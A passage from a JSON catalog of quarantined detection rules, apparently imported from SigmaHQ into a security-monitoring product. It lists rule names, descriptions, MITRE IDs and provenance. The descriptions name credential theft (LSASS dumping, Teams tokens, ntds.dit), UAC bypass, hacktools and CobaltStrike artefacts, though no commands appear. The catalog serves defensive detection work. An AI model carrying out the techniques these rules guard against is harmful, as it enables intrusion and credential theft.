"mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-script-with-file-upload-capabilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml" } }, { "id": "sigmahq-sigma-d2eb17db-1d39-41dc-b57f-301f6512fa75", "type": "detection", "name": "Potentially Suspicious Command Targeting Teams Sensitive Files", "description": "Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.\nThe database might contain authentication tokens and other sensitive information about the logged in accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-command-targeting-teams-sensitive-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" } }, { "id": "sigmahq-sigma-d353dac0-1b41-46c2-820c-d7d2561fc6ed", "type": "detection", "name": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/awl-bypass-with-winrm-vbs-and-malicious-wsmpty-xsl-wsmtxt-xsl-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml" } }, { "id": "sigmahq-sigma-d36f7c12-14a3-4d48-b6b8-774b9c66f44d", "type": "detection", "name": "Potential Python DLL SideLoading", "description": "Detects potential DLL sideloading of Python DLL files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-python-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d36f7c12-14a3-4d48-b6b8-774b9c66f44d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_python.yml" } }, { "id": "sigmahq-sigma-d36f87ea-c403-44d2-aa79-1a0ac7c24456", "type": "detection", "name": "PUA - RemCom Default Named Pipe", "description": "Detects default RemCom pipe creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-remcom-default-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d36f87ea-c403-44d2-aa79-1a0ac7c24456", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_pua_remcom_default_pipe.yml" } }, { "id": "sigmahq-sigma-d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "type": "detection", "name": "HackTool - UACMe Akagi Execution", "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-uacme-akagi-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_uacme.yml" } }, { "id": "sigmahq-sigma-d3abac66-f11c-4ed0-8acb-50cc29c97eed", "type": "detection", "name": "NetNTLM Downgrade Attack", "description": "Detects NetNTLM downgrade attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/netntlm-downgrade-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml" } }, { "id": "sigmahq-sigma-d3adb3ef-b7e7-4003-9092-1924c797db35", "type": "detection", "name": "AWS Identity Center Identity Provider Change", "description": "Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider.\nA change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-identity-center-identity-provider-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d3adb3ef-b7e7-4003-9092-1924c797db35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_sso_idp_change.yml" } }, { "id": "sigmahq-sigma-d3b70aad-097e-409c-9df2-450f80dc476b", "type": "detection", "name": "PUA - DIT Snapshot Viewer", "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-dit-snapshot-viewer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d3b70aad-097e-409c-9df2-450f80dc476b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_ditsnap.yml" } }, { "id": "sigmahq-sigma-d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", "type": "detection", "name": "Ie4uinit Lolbin Use From Invalid Path", "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ie4uinit-lolbin-use-from-invalid-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" } }, { "id": "sigmahq-sigma-d3c3861d-c504-4c77-ba55-224ba82d0118", "type": "detection", "name": "New Network Trace Capture Started Via Netsh.EXE", "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-network-trace-capture-started-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d3c3861d-c504-4c77-ba55-224ba82d0118", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml" } }, { "id": "sigmahq-sigma-d3f90469-fb05-42ce-b67d-0fded91bbef3", "type": "detection", "name": "Bitbucket User Login Failure Via SSH", "description": "Detects SSH user login access failures.\nPlease note that this rule can be noisy and is recommended to use with correlation based on \"author.name\" field.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-user-login-failure-via-ssh.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d3f90469-fb05-42ce-b67d-0fded91bbef3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_user_login_failure_via_ssh_detected.yml" } }, { "id": "sigmahq-sigma-d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", "type": "detection", "name": "File and Directory Discovery - Linux", "description": "Detects usage of system utilities such as \"find\", \"tree\", \"findmnt\", etc, to discover files, directories and network shares.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-and-directory-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml" } }, { "id": "sigmahq-sigma-d443095b-a221-4957-a2c4-cd1756c9b747", "type": "detection", "name": "Suspicious Base64 Encoded User-Agent", "description": "Detects suspicious encoded User-Agent strings, as seen used by some malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-base64-encoded-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d443095b-a221-4957-a2c4-cd1756c9b747", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_base64_encoded.yml" } }, { "id": "sigmahq-sigma-d4488827-73af-4f8d-9244-7b7662ef046e", "type": "detection", "name": "Change User Agents with WebRequest", "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-user-agents-with-webrequest.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d4488827-73af-4f8d-9244-7b7662ef046e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml" } }, { "id": "sigmahq-sigma-d4498716-1d52-438f-8084-4a603157d131", "type": "detection", "name": "Password Provided In Command Line Of Net.EXE", "description": "Detects a when net.exe is called with a password in the command line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-provided-in-command-line-of-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d4498716-1d52-438f-8084-4a603157d131", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_use_password_plaintext.yml" } }, { "id": "sigmahq-sigma-d474c8fe-bb69-4ea0-b7d9-f682b56d52d3", "type": "detection", "name": "HackTool - Doppelanger LSASS Dumper Execution", "description": "Detects the execution of the Doppelanger hacktool which is used to dump LSASS memory via process cloning while evading common detection methods", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-doppelanger-lsass-dumper-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d474c8fe-bb69-4ea0-b7d9-f682b56d52d3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_doppelganger.yml" } }, { "id": "sigmahq-sigma-d487ed4a-fd24-436d-a0b2-f4e95f7b2635", "type": "detection", "name": "Suspicious ClickFix/FileFix Execution Pattern", "description": "Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar (FileFix).\nAttackers leverage social engineering campaigns\u2014such as fake CAPTCHA challenges or urgent alerts\u2014encouraging victims to paste clipboard contents, often executing mshta.exe, powershell.exe, or similar commands to infect systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.001", "T1204.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-clickfix-filefix-execution-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d487ed4a-fd24-436d-a0b2-f4e95f7b2635", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_clickfix_filefix_execution.yml" } }, { "id": "sigmahq-sigma-d4a11f63-2390-411c-9adf-d791fd152830", "type": "detection", "name": "Windows Screen Capture with CopyFromScreen", "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-screen-capture-with-copyfromscreen.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d4a11f63-2390-411c-9adf-d791fd152830", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml" } }, { "id": "sigmahq-sigma-d4c7758e-9417-4f2e-9109-6125d66dabef", "type": "detection", "name": "User Risk and MFA Registration Policy Updated", "description": "Detects changes and updates to the user risk and MFA registration policy.\nAttackers can modified the policies to Bypass MFA, weaken security thresholds, facilitate further attacks, maintain persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-risk-and-mfa-registration-policy-updated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d4c7758e-9417-4f2e-9109-6125d66dabef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_update_risk_and_mfa_registration_policy.yml" } }, { "id": "sigmahq-sigma-d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "type": "detection", "name": "LOLBIN Execution From Abnormal Drive", "description": "Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lolbin-execution-from-abnormal-drive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml" } }, { "id": "sigmahq-sigma-d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", "type": "detection", "name": "Persistence Via Disk Cleanup Handler - Autorun", "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box [\u2026] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/persistence-via-disk-cleanup-handler-autorun.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" } }, { "id": "sigmahq-sigma-d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", "type": "detection", "name": "Potential Persistence Via Disk Cleanup Handler - Registry", "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box [\u2026]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-disk-cleanup-handler-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml" } }, { "id": "sigmahq-sigma-d51694fe-484a-46ac-92d6-969e76d60d10", "type": "detection", "name": "Access To Potentially Sensitive Sysvol Files By Uncommon Applications", "description": "Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/access-to-potentially-sensitive-sysvol-files-by-uncommon-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d51694fe-484a-46ac-92d6-969e76d60d10", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_access/file_access_win_susp_gpo_files.yml" } }, { "id": "sigmahq-sigma-d522eca2-2973-4391-a3e0-ef0374321dae", "type": "detection", "name": "Abused Debug Privilege by Arbitrary Parent Processes", "description": "Detection of unusual child processes by different system processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/abused-debug-privilege-by-arbitrary-parent-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d522eca2-2973-4391-a3e0-ef0374321dae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml" } }, { "id": "sigmahq-sigma-d526c60a-e236-4011-b165-831ffa52ab70", "type": "detection", "name": "Windows Vulnerable Driver Blocklist Disabled", "description": "Detects when the Windows Vulnerable Driver Blocklist is set to disabled. This setting is crucial for preventing the loading of known vulnerable drivers,\nand its modification may indicate an attempt to bypass security controls. It is often targeted by threat actors to facilitate the installation of malicious or vulnerable drivers,\nparticularly in scenarios involving Endpoint Detection and Response (EDR) bypass techniques.\nThis rule applies to systems that support the Vulnerable Driver Blocklist feature, including Windows 10 version 1903 and later, and Windows Server 2022 and later.\nNote that this change will require a reboot to take effect, and this rule only detects the registry modification action.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-vulnerable-driver-blocklist-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d526c60a-e236-4011-b165-831ffa52ab70", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable.yml" } }, { "id": "sigmahq-sigma-d54c2f06-aca9-4e2b-81c9-5317858f4b79", "type": "detection", "name": "ESXi VSAN Information Discovery Via ESXCLI", "description": "Detects execution of the \"esxcli\" command with the \"vsan\" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033", "T1007", "T1059.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-vsan-information-discovery-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d54c2f06-aca9-4e2b-81c9-5317858f4b79", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml" } }, { "id": "sigmahq-sigma-d557dc06-62e8-4468-a8e8-7984124908ce", "type": "detection", "name": "HackTool - WinPwn Execution", "description": "Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1046", "T1082", "T1106", "T1518", "T1548.002", "T1552.001", "T1555", "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-winpwn-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d557dc06-62e8-4468-a8e8-7984124908ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_winpwn.yml" } }, { "id": "sigmahq-sigma-d55b793d-f847-4eea-b59a-5ab09908ac90", "type": "detection", "name": "Suspicious Child Process Of Veeam Dabatase", "description": "Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-of-veeam-dabatase.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d55b793d-f847-4eea-b59a-5ab09908ac90", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", "type": "detection", "name": "CobaltStrike Named Pipe", "description": "Detects the creation of a named pipe as used by CobaltStrike", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, 